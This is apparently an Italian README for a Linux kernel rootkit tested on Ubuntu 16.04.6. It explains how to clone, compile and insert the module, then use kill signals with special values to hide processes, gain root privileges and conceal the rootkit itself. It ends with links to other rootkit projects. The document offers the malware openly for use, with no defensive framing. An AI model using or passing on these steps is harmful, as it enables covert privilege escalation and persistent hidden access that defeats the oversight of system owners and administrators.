
Un rootkit per ubuntu-16.04.6 (Linux 4.4). Può nascondere un processo, dare accesso root e nascondersi.
Questo è un rootkit che è stato testato su ubuntu-16.04.6-desktop-amd64 (Linux 4.4), ma dovrebbe essere facile da portare su diverse versioni del kernel.
Link al video --> https://drive.google.com/file/d/1yDktAg9vIPBH3OPEBYset9OdQb0LMevA/view?usp=sharing
Clona il repository
git clone https://github.com/Asekon/RootKit
Entra nella cartella
cd RootKit
Compila
sudo make
Inserisci il modulo nel kernel come root
sudo insmod RootKit.ko
Nascondi/Mostra un processo (esempio: PID 500)
kill -0 500
Ottieni accesso root (puoi inserire qualsiasi PID, non deve essere 0)
kill -1 0
Nascondi/Mostra il rootkit (puoi inserire qualsiasi PID, non deve essere 0)
kill -2 0
Rimuovi il modulo dal kernel come root (assicurati prima che sia visibile nell'elenco dei moduli)
sudo rmmod RootKit
https://en.wikipedia.org/wiki/Rootkit
http://dandylife.net/blog/archives/304
https://github.com/nurupo/rootkit
https://github.com/f0rb1dd3n/Reptile
https://github.com/m0nad/Diamorphine
http://derekmolloy.ie/writing-a-linux-kernel-module-part-1-introduction/
http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html
https://yassine.tioual.com/index.php/2017/01/10/hiding-processes-for-fun-and-profit/